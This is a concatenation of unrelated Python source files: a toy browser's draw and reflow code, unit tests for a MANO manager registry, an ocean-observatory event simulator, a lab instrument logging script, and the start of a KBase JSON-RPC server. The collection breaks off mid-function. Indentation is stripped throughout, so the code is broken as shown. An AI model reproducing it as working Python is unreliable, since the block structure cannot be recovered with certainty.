self.display_list = []
self.document.paint(self.display_list)
def reflow(self, obj):
if args.compute_main_thread_timings:
self.main_thread_timer.start("Style")
style(obj.node, None, self.rules)
if args.compute_main_thread_timings:
self.main_thread_timer.start("Layout (phase 1A)")
obj.size()
if args.compute_main_thread_timings:
self.main_thread_timer.start("Layout (phase 1B)")
while obj.parent:
obj.parent.compute_height()
obj = obj.parent
if args.compute_main_thread_timings:
self.main_thread_timer.start("Layout (phase 2)")
self.document.position()
def draw(self):
if args.compute_compositor_thread_timings:
self.compositor_thread_timer.reset()
self.compositor_thread_timer.start("Draw")
self.canvas.delete("all")
for cmd in self.draw_display_list:
if cmd.y1 > self.scroll + HEIGHT - 60: continue
if cmd.y2 < self.scroll: continue
cmd.draw(self.scroll - 60, self.canvas)
if args.compute_compositor_thread_timings:
self.main_thread_timer.start("Draw Chrome")
self.canvas.create_rectangle(0, 0, 800, 60, width=0, fill='light gray')
self.canvas.create_rectangle(50, 10, 790, 50)
font = tkinter.font.Font(family="Courier", size=30)
self.canvas.create_text(55, 15, anchor='nw', text=self.address_bar, font=font)
self.canvas.create_rectangle(10, 10, 35, 50)
self.canvas.create_polygon(15, 30, 30, 15, 30, 45, fill='black')
if self.focus == "address bar":
w = font.measure(self.address_bar)
self.canvas.create_line(55 + w, 15, 55 + w, 45)
elif isinstance(self.focus, InputLayout):
text = self.focus.node.attributes.get("value", "")
x = self.focus.x + self.focus.font.measure(text)
y = self.focus.y - self.scroll + 60
self.canvas.create_line(x, y, x, y + self.focus.h)
if args.compute_compositor_thread_timings:
self.compositor_thread_timer.stop()
self.compositor_thread_timer.print_accumulated()
# Runs on the compositor thread
def scrolldown(self, e):
self.compositor_lock.acquire(blocking=True)
self.scroll = self.scroll + SCROLL_STEP
self.scroll = min(self.scroll, self.max_y)
self.scroll = max(0, self.scroll)
self.compositor_lock.release()
self.set_needs_animation_frame()
if __name__ == "__main__":
import sys
parser = argparse.ArgumentParser(description="Chapter 13 source code")
parser.add_argument("--url", default=2, type=str, required=True,
help="URL to load")
parser.add_argument("--stop_after", default=0, type=int,
help="If set, exits the browser after this many generates frames")
parser.add_argument("--compute_main_thread_timings", type=bool,
help="Compute main thread timings")
parser.add_argument("--compute_compositor_thread_timings", type=bool,
help="Compute compositor thread timings")
args = parser.parse_args()
browser = Browser()
browser.start()
browser.schedule_load(args.url)
tkinter.mainloop()
|
test_smr.py
|
import logging
import threading
import time
import unittest
from multiprocessing import Process
from test.instantiation import fakeslm_instantiation
from test.onboarding import fakeslm_onboarding
from test.terminating import fakeslm_termination
from test.updating import fakeslm_updating
from manobase.messaging import ManoBrokerRequestResponseConnection, Message
from smr.main import SpecificManagerRegistry
logging.basicConfig(level=logging.INFO)
LOG = logging.getLogger("mano-plugins:smr_test")
LOG.setLevel(logging.INFO)
class test_SMR_functionalities(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.smr_proc = Process(target=SpecificManagerRegistry)
cls.smr_proc.daemon = True
cls.manoconn = ManoBrokerRequestResponseConnection(
"son-plugin.SpecificManagerRegistry"
)
cls.wait_for_ssm_event = threading.Event()
cls.wait_for_ssm_event.clear()
cls.wait_for_fsm_event = threading.Event()
cls.wait_for_fsm_event.clear()
cls.event1 = False
cls.event2 = False
cls.smr_proc.start()
time.sleep(4)
@classmethod
def tearDownClass(cls):
if cls.smr_proc is not None:
cls.smr_proc.terminate()
del cls.smr_proc
try:
cls.manoconn.stop_connection()
except Exception as e:
LOG.exception("Stop connection exception.")
del cls.wait_for_fsm_event
del cls.wait_for_ssm_event
def ssm_eventFinished(self):
self.wait_for_ssm_event.set()
def waitForSSMEvent(self, timeout=5, msg="Event timed out."):
if not self.wait_for_ssm_event.wait(timeout):
self.assertEqual(True, False, msg=msg)
def fsm_eventFinished(self):
self.wait_for_fsm_event.set()
def waitForFSMEvent(self, timeout=5, msg="Event timed out."):
if not self.wait_for_fsm_event.wait(timeout):
self.assertEqual(True, False, msg=msg)
def test_1_SMR_onboard(self):
self.event1 = False
self.event2 = False
def on_ssm_onboarding_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
self.assertTrue(
list(result.keys())
== ["sonssmservice1dumb1", "sonssmservice1placement1"]
or list(result.keys())
== ["sonssmservice1placement1", "sonssmservice1dumb1"],
msg="not all SSMs results received",
)
self.assertTrue(
result["sonssmservice1dumb1"]["status"] == "On-boarded",
msg="error in onbording sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1dumb1"]["error"] == "None",
msg="error in onbording sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1placement1"]["status"] == "On-boarded",
msg="error in onbording sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1placement1"]["error"] == "None",
msg="error in onbording sonssmservice1placement1",
)
self.ssm_eventFinished()
def on_fsm_onboarding_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
if list(result.keys()) == ["sonfsmservice1function1dumb1"]:
self.assertTrue(
list(result.keys()) == ["sonfsmservice1function1dumb1"],
msg="not all FSMs results in VNFD1 received",
)
self.assertTrue(
result["sonfsmservice1function1dumb1"]["status"]
== "On-boarded",
msg="error in onbording sonssmservice1dumb1",
)
self.assertTrue(
result["sonfsmservice1function1dumb1"]["error"] == "None",
msg="error in onbording sonfsmservice1function1dumb1",
)
self.event1 = True
else:
self.assertTrue(
list(result.keys())
== [
"sonfsmservice1function1monitoring1",
"sonfsmservice1firewallconfiguration1",
]
or list(result.keys())
== [
"sonfsmservice1firewallconfiguration1",
"sonfsmservice1function1monitoring1",
],
msg="not all FSMs results in VNFD2 received",
)
self.assertTrue(
result["sonfsmservice1function1monitoring1"]["status"]
== "On-boarded",
msg="error in onbording sonssmservice1dumb1",
)
self.assertTrue(
result["sonfsmservice1function1monitoring1"]["error"] == "None",
msg="error in onbording sonfsmservice1function1monitoring1",
)
self.assertTrue(
result["sonfsmservice1firewallconfiguration1"]["status"]
== "On-boarded",
msg="error in onbording sonssmservice1dumb1",
)
self.assertTrue(
result["sonfsmservice1firewallconfiguration1"]["error"]
== "None",
msg="error in onbording sonfsmservice1firewallconfiguration1",
)
self.event2 = True
if self.event1 and self.event2 == True:
self.fsm_eventFinished()
self.manoconn.subscribe(
on_ssm_onboarding_result, "specific.manager.registry.ssm.on-board"
)
self.manoconn.subscribe(
on_fsm_onboarding_result, "specific.manager.registry.fsm.on-board"
)
onboaring_proc = Process(target=fakeslm_onboarding)
onboaring_proc.daemon = True
onboaring_proc.start()
self.waitForSSMEvent(timeout=70, msg="SSM Onboarding request not received.")
self.waitForFSMEvent(timeout=70, msg="FSM Onboarding request not received.")
self.wait_for_fsm_event.clear()
self.wait_for_ssm_event.clear()
onboaring_proc.terminate()
del onboaring_proc
def test_2_SMR_instantiation(self):
self.event1 = False
self.event2 = False
def on_ssm_instantiation_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
self.assertTrue(
list(result.keys())
== ["sonssmservice1dumb1", "sonssmservice1placement1"]
or list(result.keys())
== ["sonssmservice1placement1", "sonssmservice1dumb1"],
msg="not all SSMs results received",
)
self.assertTrue(
result["sonssmservice1dumb1"]["status"] == "Instantiated",
msg="error in instantiation sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1dumb1"]["error"] == "None",
msg="error in instantiation sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1placement1"]["status"] == "Instantiated",
msg="error in instantiation sonssmservice1placement1",
)
self.assertTrue(
result["sonssmservice1placement1"]["error"] == "None",
msg="error in instantiation sonssmservice1placement1",
)
self.ssm_eventFinished()
def on_fsm_instantiation_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
if list(result.keys()) == ["sonfsmservice1function1dumb1"]:
self.assertTrue(
list(result.keys()) == ["sonfsmservice1function1dumb1"],
msg="not all FSMs instantiation results in VNFD1 received",
)
self.assertTrue(
result["sonfsmservice1function1dumb1"]["status"]
== "Instantiated",
msg="error in instantiation sonfsmservice1function1dumb1",
)
self.assertTrue(
result["sonfsmservice1function1dumb1"]["error"] == "None",
msg="error in instantiation sonfsmservice1function1dumb1",
)
self.event1 = True
else:
self.assertTrue(
list(result.keys())
== [
"sonfsmservice1function1monitoring1",
"sonfsmservice1firewallconfiguration1",
]
or list(result.keys())
== [
"sonfsmservice1firewallconfiguration1",
"sonfsmservice1function1monitoring1",
],
msg="not all FSMs instantiation results in VNFD2 received",
)
self.assertTrue(
result["sonfsmservice1function1monitoring1"]["status"]
== "Instantiated",
msg="error in instantiation sonfsmservice1function1monitoring1",
)
self.assertTrue(
result["sonfsmservice1function1monitoring1"]["error"] == "None",
msg="error in instantiation sonfsmservice1function1monitoring1",
)
self.assertTrue(
result["sonfsmservice1firewallconfiguration1"]["status"]
== "Instantiated",
msg="error in instantiation sonfsmservice1firewallconfiguration1",
)
self.assertTrue(
result["sonfsmservice1firewallconfiguration1"]["error"]
== "None",
msg="error in instantiation sonfsmservice1firewallconfiguration1",
)
self.event2 = True
if self.event1 and self.event2:
self.fsm_eventFinished()
self.manoconn.subscribe(
on_ssm_instantiation_result, "specific.manager.registry.ssm.instantiate"
)
self.manoconn.subscribe(
on_fsm_instantiation_result, "specific.manager.registry.fsm.instantiate"
)
instantiation_proc = Process(target=fakeslm_instantiation)
instantiation_proc.daemon = True
instantiation_proc.start()
self.waitForSSMEvent(timeout=70, msg="SSM instantiation request not received.")
self.waitForFSMEvent(timeout=70, msg="FSM instantiation request not received.")
self.wait_for_ssm_event.clear()
self.wait_for_fsm_event.clear()
instantiation_proc.terminate()
del instantiation_proc
def test_3_SMR_update(self):
def on_ssm_updating_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
self.assertTrue(
list(result.keys()) == ["sonssmservice1dumb1"],
msg="not all SSMs results received",
)
self.assertTrue(
result["sonssmservice1dumb1"]["status"] == "Updated",
msg="error in updating status filed sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1dumb1"]["error"] == "None",
msg="error in updating error filed sonssmservice1dumb1",
)
self.ssm_eventFinished()
def on_fsm_updating_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
self.assertTrue(
list(result.keys()) == ["sonfsmservice1function1updateddumb1"],
msg="not all FSMs updating results in VNFD2 received",
)
self.assertTrue(
result["sonfsmservice1function1updateddumb1"]["status"]
== "Updated",
msg="error in updating sonfsmservice1function1monitoring1",
)
self.assertTrue(
result["sonfsmservice1function1updateddumb1"]["error"] == "None",
msg="error in updating sonfsmservice1function1monitoring1",
)
self.fsm_eventFinished()
self.manoconn.subscribe(
on_ssm_updating_result, "specific.manager.registry.ssm.update"
)
self.manoconn.subscribe(
on_fsm_updating_result, "specific.manager.registry.fsm.update"
)
updating_proc = Process(target=fakeslm_updating)
updating_proc.daemon = True
updating_proc.start()
self.waitForSSMEvent(timeout=70, msg="SSM updating request not received.")
self.waitForFSMEvent(timeout=70, msg="FSM updating request not received.")
self.wait_for_fsm_event.clear()
self.wait_for_ssm_event.clear()
updating_proc.terminate()
del updating_proc
def test_4_SMR_terminate(self):
self.event1 = False
self.event2 = False
def on_ssm_termination_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
self.assertTrue(
list(result.keys())
== ["sonssmservice1dumb1", "sonssmservice1placement1"]
or ["sonssmservice1placement1", "sonssmservice1dumb1"],
msg="not all SSMs results received",
)
self.assertTrue(
result["sonssmservice1dumb1"]["status"] == "Terminated",
msg="error in termination status field sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1dumb1"]["error"] == "None",
msg="error in termination error field sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1placement1"]["status"] == "Terminated",
msg="error in termination status field sonssmservice1placement1",
)
self.assertTrue(
result["sonssmservice1placement1"]["error"] == "None",
msg="error in termination error field sonssmservice1placement1",
)
self.ssm_eventFinished()
def on_fsm_termination_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
if list(result.keys()) == ["sonfsmservice1function1dumb1"]:
self.assertTrue(
result["sonfsmservice1function1dumb1"]["status"]
== "Terminated",
msg="error in termination status field sonfsmservice1function1dumb1",
)
self.assertTrue(
result["sonfsmservice1function1dumb1"]["error"] == "None",
msg="error in termination error field sonfsmservice1function1dumb1",
)
self.event1 = True
else:
self.assertTrue(
list(result.keys())
== [
"sonfsmservice1function1monitoring1",
"sonfsmservice1function1updateddumb1",
]
or list(result.keys())
== [
"sonfsmservice1function1updateddumb1",
"sonfsmservice1function1monitoring1",
],
msg="not all FSMs Termination results in vnfdt2 received",
)
self.assertTrue(
result["sonfsmservice1function1monitoring1"]["status"]
== "Terminated",
msg="error in termination status field sonfsmservice1function1monitoring1",
)
self.assertTrue(
result["sonfsmservice1function1monitoring1"]["error"] == "None",
msg="error in termination error field sonfsmservice1function1monitoring1",
)
self.assertTrue(
result["sonfsmservice1function1updateddumb1"]["status"]
== "Terminated",
msg="error in termination status field sonfsmservice1function1updateddumb1",
)
self.assertTrue(
result["sonfsmservice1function1updateddumb1"]["error"]
== "None",
msg="error in termination error field sonfsmservice1function1updateddumb1",
)
self.event2 = True
self.fsm_eventFinished()
if self.event1 and self.event2:
self.fsm_eventFinished()
self.manoconn.subscribe(
on_ssm_termination_result, "specific.manager.registry.ssm.terminate"
)
self.manoconn.subscribe(
on_fsm_termination_result, "specific.manager.registry.fsm.terminate"
)
termination_proc = Process(target=fakeslm_termination)
termination_proc.daemon = True
termination_proc.start()
self.waitForSSMEvent(timeout=70, msg="SSM termination request not received.")
self.waitForFSMEvent(timeout=70, msg="FSM termination request not received.")
self.wait_for_fsm_event.clear()
self.wait_for_ssm_event.clear()
termination_proc.terminate()
del termination_proc
if __name__ == "__main__":
unittest.main()
|
oms_events.py
|
#!/usr/bin/env python
"""
@package ion.agents.platform.rsn.simulator.oms_events
@file ion/agents/platform/rsn/simulator/oms_events.py
@author Carlos Rueda
@brief OMS simulator event definitions and supporting functions.
Demo program included that allows to run both a listener server and a
notifier. See demo program usage at the end of this file.
"""
__author__ = 'Carlos Rueda'
import httplib
import json
import sys
from time import sleep
import time
from urlparse import urlparse
import ntplib
import yaml
from ion.agents.platform.rsn.simulator.logger import Logger
log = Logger.get_logger()
if not getattr(log, "trace", None):
setattr(log, "trace", log.debug)
##########################################################################
# The "event type" concept was removed from the interface (~Apr/2013).
# To minimize changes in the code, simply introduce an 'ALL' event type here.
class EventInfo(object):
EVENT_TYPES = {
'ALL': {
'name': 'on battery',
'severity': 3,
'group': 'power',
}
}
class EventNotifier(object):
def __init__(self):
# _listeners: { event_type: {url: reg_time, ...}, ... }
# initialize with empty dict for each event type:
self._listeners = dict((et, {}) for et in EventInfo.EVENT_TYPES)
def add_listener(self, url, event_type):
assert event_type in EventInfo.EVENT_TYPES
url_dict = self._listeners[event_type]
if not url in url_dict:
url_dict[url] = ntplib.system_to_ntp_time(time.time())
log.trace("added listener=%s for event_type=%s", url, event_type)
return url_dict[url]
def remove_listener(self, url, event_type):
assert event_type in EventInfo.EVENT_TYPES
url_dict = self._listeners[event_type]
unreg_time = 0
if url in url_dict:
unreg_time = ntplib.system_to_ntp_time(time.time())
del url_dict[url]
log.trace("removed listener=%s for event_type=%s", url, event_type)
return unreg_time
def notify(self, event_instance):
"""
Notifies the event to all associated listeners.
"""
assert isinstance(event_instance, dict)
urls = self._listeners['ALL']
if not len(urls):
# no event listeners for event_type; just ignore notification:
return
# copy list to get a snapshot of the current dictionary and thus avoid
# concurrent modification kind of runtime errors like:
# RuntimeError: dictionary changed size during iteration
urls = list(urls)
for url in urls:
self._notify_listener(url, event_instance)
def _notify_listener(self, url, event_instance):
"""
Notifies event to given listener.
"""
if url == "http://NO_OMS_NOTIFICATIONS": # pragma: no cover
# developer convenience -see ion.agents.platform.rsn.oms_event_listener
return
log.debug("Notifying event_instance=%s to listener=%s", str(event_instance), url)
# include url in event instance for diagnostic/debugging purposes:
event_instance['listener_url'] = url
# prepare payload (array of event instances in JSON format):
payload = json.dumps([event_instance], indent=2)
log.trace("payload=\n%s", payload)
headers = {
"Content-type": "application/json",
"Accept": "text/plain"
}
conn = None
try:
o = urlparse(url)
url4conn = o.netloc
path = o.path
conn = httplib.HTTPConnection(url4conn)
conn.request("POST", path, body=payload, headers=headers)
response = conn.getresponse()
data = response.read()
log.trace("RESPONSE: %s, %s, %s", response.status, response.reason, data)
except Exception as e:
# the actual listener is no longer there; just log a message
log.warn("event notification HTTP request failed: %r: %s", url, e)
finally:
if conn:
conn.close()
class EventGenerator(object):
"""
Simple helper to generate and trigger event notifications.
"""
def __init__(self, notifier, events_filename=None):
self._notifier = notifier
self._events = None
if events_filename:
try:
with open(events_filename, 'r') as f:
log.info('loading events from: %s', events_filename)
pyobj = yaml.load(f)
self._events = [dict(obj) for obj in pyobj]
except Exception as ex:
log.warn('could not load events from %s. Continuing with '
'hard-coded event', events_filename)
self._keep_running = True
self._index = 0 # in EventInfo.EVENT_TYPES or self._events
# self._runnable set depending on whether we're under pyon or not
if 'pyon' in sys.modules:
from gevent import Greenlet
self._runnable = Greenlet(self._run)
log.debug("!!!! EventGenerator: pyon detected: using Greenlet")
else:
from threading import Thread
self._runnable = Thread(target=self._run)
self._runnable.setDaemon(True)
log.debug("!!!! EventGenerator: pyon not detected: using Thread")
def generate_and_notify_event(self):
if self._events:
if self._index >= len(self._events):
self._index = 0
event = self._events[self._index]
self._index += 1
event_id = event['event_id']
platform_id = event['platform_id']
message = event.get('message', "%s's message" % event_id)
group = event.get('group', '')
severity = event.get('severity', 3)
else:
if self._index >= len(EventInfo.EVENT_TYPES):
self._index = 0
event_type = EventInfo.EVENT_TYPES.values()[self._index]
self._index += 1
event_id = "TODO_some_event_id"
platform_id = "TODO_some_platform_id"
message = "%s (synthetic event generated from simulator)" % event_type['name']
group = event_type['group']
severity = event_type['severity']
timestamp = ntplib.system_to_ntp_time(time.time())
first_time_timestamp = timestamp
event_instance = {
'event_id': event_id,
'message': message,
'platform_id': platform_id,
'timestamp': timestamp,
'first_time_timestamp': first_time_timestamp,
'severity': severity,
'group': group,
}
log.debug("notifying event_instance=%s", str(event_instance))
self._notifier.notify(event_instance)
def start(self):
self._runnable.start()
def _run(self):
sleep(3) # wait a bit before first event
while self._keep_running:
self.generate_and_notify_event()
# sleep for a few secs regularly checking we still are running
secs = 7
while self._keep_running and secs > 0:
sleep(0.3)
secs -= 0.3
log.trace("event generation stopped.")
def stop(self):
log.trace("stopping event generation...")
self._keep_running = False
if __name__ == "__main__": # pragma: no cover
#
# first, call this demo program with command line argument 'listener',
# then, on a second terminal, with argument 'notifier'
#
host, port = "localhost", 8000
if len(sys.argv) > 1 and sys.argv[1] == "listener":
# run listener
from gevent.pywsgi import WSGIServer
def application(environ, start_response):
#print('listener got environ=%s' % str(environ))
print(" ".join(('%s=%s' % (k, environ[k])) for k in [
'CONTENT_LENGTH','CONTENT_TYPE', 'HTTP_ACCEPT']))
input = environ['wsgi.input']
body = "".join(input.readlines())
print('body=\n%s' % body)
#
# note: the expected content format is JSON and we can in general
# parse with either json or yaml ("every JSON file is also a valid
# YAML file" -- http://yaml.org/spec/1.2/spec.html#id2759572):
#
event_instance = yaml.load(body)
print('event_instance=%s' % str(event_instance))
# respond OK:
headers = [('Content-Type', 'text/plain') ]
status = '200 OK'
start_response(status, headers)
return "MY-RESPONSE. BYE"
print("%s:%s: listening for event notifications..." % (host, port))
WSGIServer((host, port), application).serve_forever()
elif len(sys.argv) > 1 and sys.argv[1] == "notifier":
# run notifier
notifier = EventNotifier()
url = "http://%s:%s" % (host, port)
for event_type in EventInfo.EVENT_TYPES.keys():
notifier.add_listener(url, event_type)
print("registered listener to event_type=%r" % event_type)
generator = EventGenerator(notifier)
secs = 15
print("generating events for %s seconds ..." % secs)
generator.start()
sleep(secs)
generator.stop()
else:
print("usage: call me with arg 'listener' or 'notifier'")
"""
Test program
TERMINAL 1:
$ bin/python ion/agents/platform/rsn/simulator/oms_events.py listener
localhost:8000: listening for event notifications...
TERMINAL 2:
$ bin/python ion/agents/platform/rsn/simulator/oms_events.py notifier
oms_simulator: setting log level to: logging.WARN
registered listener to event_type='ALL'
generating events for 15 seconds ...
TERMINAL 1:
CONTENT_LENGTH=270 CONTENT_TYPE=application/json HTTP_ACCEPT=text/plain
body=
{
"group": "power",
"severity": 3,
"url": "http://localhost:8000",
"timestamp": 3578265811.422655,
"platform_id": "TODO_some_platform_id",
"message": "on battery (synthetic event generated from simulator)",
"first_time_timestamp": 3578265811.422655
}
event_instance={'platform_id': 'TODO_some_platform_id', 'group': 'power', 'severity': 3, 'url': 'http://localhost:8000', 'timestamp': 3578265811.422655, 'message': 'on battery (synthetic event generated from simulator)', 'first_time_timestamp': 3578265811.422655}
127.0.0.1 - - [2013-05-22 19:43:31] "POST / HTTP/1.1" 200 118 0.002814
CONTENT_LENGTH=270 CONTENT_TYPE=application/json HTTP_ACCEPT=text/plain
body=
{
"group": "power",
"severity": 3,
"url": "http://localhost:8000",
"timestamp": 3578265818.647295,
"platform_id": "TODO_some_platform_id",
"message": "on battery (synthetic event generated from simulator)",
"first_time_timestamp": 3578265818.647295
}
event_instance={'platform_id': 'TODO_some_platform_id', 'group': 'power', 'severity': 3, 'url': 'http://localhost:8000', 'timestamp': 3578265818.647295, 'message': 'on battery (synthetic event generated from simulator)', 'first_time_timestamp': 3578265818.647295}
127.0.0.1 - - [2013-05-22 19:43:38] "POST / HTTP/1.1" 200 118 0.003455
"""
|
tasks.py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 24 10:37:57 2020
@author: OPEGLAB
"""
# coding: utf-8
# Library that depends on the pyLab library and that contains the main program/functions
# for driving the LEC devices at diferent modes.
import numpy as np
from time import sleep, time
from pyInstruments.instruments import keithley24XX # This the module I created
import datetime
import os
from collections import deque
from pyGonioSpectrometer.instrumentation import SpectraMeasurement, list_spectrometers
from pyvisa import ResourceManager
from threading import Thread
def dt_calc(etime):
"""Returns an interval of time that increased as the ellapsed time etime increases"""
if etime <= 60:
return 5
elif etime <= 300:
return 10
elif etime <= 600:
return 30
elif etime <= 3600:
return 60
else:
return 300
class IVL_LoggerTask(object):
def __init__(self, sourcemeter = None, spectrometer = None, integration_time = 100, n_spectra = 1, folder = '.\\', filename = 'voltage-spectra-time-data',\
mode = 'CC', term = 'FRONT', fw = False, beeper = True, cmpl = 21.0, Ncount = 1,\
aver = False, nplc = 1.0, config_flag = True):
"""
Parameters
----------
sourcemeter : str, optional
The resource name for the sourcemeter Keithley24XXThe default is None.
spectrometer : seabreeze.spectrometers.Spectrometer class, optional
The resource name for the spectrometer. The default is None.
integration_time : int or float, optional
Sets the integration time in ms. The default is 100.
n_spectra : int, optional
Number of spectra that will be averaged when using the method get_averaged_spectra(). The default is 1.
folder : str, optional
Folder where to save the data, abs o relative. The default is '.\'.
filename : bool, optional
Filename where to save the data. Always append if the file already exists. The default is 'voltage-time-data'.
mode : str, optional
Input 'CC' or 'CV' for constant current/voltage modes. The default is 'CC'.
term : str, optional
Output terminal for the Keithley, only 'FRONT' or 'REAR' is accepted. The default is 'FRONT'.
fw : bool, optional
Activate the four-wire measurement. The default is False.
beeper : bool, optional
Activate the beeper. The default is True.
cmpl : float, optional
Compliance for the sourcemeter (either in V or A, depending on the mode). The default is 21.0.
Ncount : int, optional
Number of samples to ask the sourcemeter. The default is 1.
aver : bool, optional
Whether to average the number of samples given for Ncount. The default is False.
nplc : float, optional
Number of pulse light cycles to integrate. The default is 1.0.
config_flag : bool, optional
Whether to configurate or not the sourcemeter. The default is True.
Returns
-------
None.
"""
self.max_length = 500
self.time = deque([], self.max_length )
self.voltage = deque([], self.max_length )
self.intensity = deque([], self.max_length )
self.sourcemeter = sourcemeter
self.spectrometer = spectrometer
self.folder = folder
self.filename = filename
self.mode = mode
self.configuration = dict(term = term, fw = fw, beeper = beeper, cmpl = cmpl, Ncount = Ncount, aver = aver, nplc = nplc)
self.configuration_spectrometer = dict(integration_time = integration_time, n_spectra = n_spectra)
self.config_flag = config_flag
self.value = 0.00
self.min_counts_allowed = 10000
def configurate(self):
"""
Configurates and powers the instrument on the instrument.
"""
# Opening the sourcemeter only done if not done before
if self.sourcemeter == None:
raise ValueError('The sourcemeter resource has not been defined. Please define it throught the sourcemeter attribute')
self.keithley = keithley24XX(self.sourcemeter)
if self.config_flag:
if self.mode == 'CC':
print('INFO: Instrument configured in CC mode.')
self.keithley.mode_ifix_configure(**self.configuration)
elif self.mode == 'CV':
print('INFO: Instrument configured in CV mode.')
self.keithley.mode_vfix_configure(**self.configuration)
else:
raise ValueError('ERROR: Configuration mode not known! Only CC or CV allowed')
# Opening the spectrometer only done if not done before
if self.spectrometer == None:
raise ValueError('The spectrometer resource has not been defined. Please define it throught the spectrometer attribute')
self.flame = SpectraMeasurement(self.spectrometer, **self.configuration_spectrometer)
self.wavelengths = self.flame.get_wavelengths()
def run(self, value, runtime = np.inf):
"""
Parameters
----------
value : float
Current (in mA) or voltage (V) setpoint value.
runtime : float, optional
Running time of the experiment in seconds. The default is np.inf.
dt : float, optional
Rime inverval between measurements. The default is 0.25.
dt_fix : bool, optional
If True, the time interval is fixed. If set to False, then it uses the time interval from the function dt_calc(). The default is True.
"""
############ LOGGING THE DATA ###################################
# Opening the file to save the data
self.filename = os.path.join(self.folder, self.filename + f'_{self.flame.integration_time/1000:.0f}ms.txt')
if not os.path.isfile(self.filename):
with open(self.filename,'a') as f:
f.write(('# '+ 5*'{:^12}\t' + '\n').format('EllapsedTime','Current','Voltage', 'Integration Time', 'Spectra'))
f.write(('# '+ 5*'{:^12}\t' + '\n').format('s','mA', 'V', 'ms','counts'))
# Saving the wavelength vector
self.write2file(np.nan, np.nan, np.nan, np.nan, self.wavelengths)
# Taking and saving the dark spectra
tspectra = self.flame.get_averaged_intensities()
# Saving the wavelength vector
self.write2file(np.nan, np.nan, np.nan, self.flame.integration_time / 1000, tspectra)
print('Current value: ', value)
if self.mode == 'CC':
self.keithley.mode_ifix_setcurr(value / 1000.0, curr_max = 0.1, curr_min= 0.00)
else:
self.keithley.mode_vfix_setvolt(value)
ttime = 0.0
etime= 0.0 # Ellapsed time
itime = time() # Initial time
i = 0 # Step counter
print('# Measurement started')
self.keithley.outpon()
self.running = True
while etime < runtime and self.running:
try:
time1 = time()
[mvoltage, mcurrent, _ , ttime, _ ] = self.keithley.read()
tspectra = self.flame.get_averaged_intensities()
etime = time() - itime
self.write2file(etime, mcurrent*1000.0, mvoltage, self.flame.integration_time / 1000, tspectra)
print(f'\r #{i+1:2d}, ellapsed time = {etime:.1f} s, V = {mvoltage:.2f} V, I = {mcurrent*1000:.2f} mA', end = '')
# Check for any values higher than saturation
if np.any(tspectra > self.flame.saturation_counts):
print('\n! WARNING: Some values are saturating. Consider lowering the integration time.')
elif tspectra.max() < self.min_counts_allowed:
print('\n! WARNING: The max. count is less than 10000. Consider increasing the integration time')
i += 1
self.time.append(datetime.datetime.now())
self.intensity.append(mcurrent)
self.voltage.append(mvoltage)
self.spectra = tspectra
if self.value != value:
value = self.value
if self.mode == 'CC':
self.keithley.mode_ifix_setcurr(self.value / 1000.0,curr_max=0.1, curr_min= 0.00)
else:
self.keithley.mode_vfix_setvolt(self.value)
sleeping_time = dt_calc(etime)
while ((time() - time1) < sleeping_time) & self.running:
sleep(0.01)
except KeyboardInterrupt:
# In case of error turn off the source anyway and stop the program
print('INFO: Programm interrupted in a safe way\n')
break
except Exception as e:
# In case of ANY error turn off the source anyway and stop the program while printing the error
print(e)
break
# self.keithley.outpoff()
self.flame.close()
def measurement_on(self):
self.running = True
def measurement_off(self):
self.running = False
def write2file(self, etime, current, voltage, integration_time, data):
"""
Write to a file
"""
t = np.hstack((etime, current, voltage, integration_time, data))
t = t.reshape((1, t.shape[0]))
with open(self.filename, 'a') as f:
np.savetxt(f, t, fmt = '%8.6g')
if __name__ == '__main__':
# This will only be used if the script is called as it is, not if it is used as a function
# Assume the first port is the Arduino
lspectrometers = list_spectrometers()
spectrometer = None if len(lspectrometers) == 0 else lspectrometers[0]
print(f'Spectrometer: {spectrometer}')
# Assuming there is only one spectrometer, so taking the first element
list_of_resources = ResourceManager().list_resources()
default_resource = [s for s in list_of_resources if 'GPIB' in s]
sourcemeter = None if len(default_resource) == 0 else default_resource[0]
print(f'Sourcemeter: {sourcemeter}')
integration_time =200
n_spectra = 1
folder = r'C:\Users\JOANRR\Documents\Python Scripts\data\Etienne'
filename = 'graphene_device02'
m = IVL_LoggerTask(sourcemeter=sourcemeter, spectrometer=spectrometer, integration_time=integration_time, n_spectra=n_spectra, folder = folder, filename = filename)
intensity = 1.0 #mA
m.config_flag = False
m.configuration['term'] = 'FRONT'
m.configuration['cmpl'] = 51
m.value = intensity
m.configurate()
print('Press Ctrl+C to interrupt the measurement')
thread = Thread(target = m.run, args = (intensity, ))
thread.daemon = True
thread.start()
|
kb_PICRUSt2Server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_PICRUSt2.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
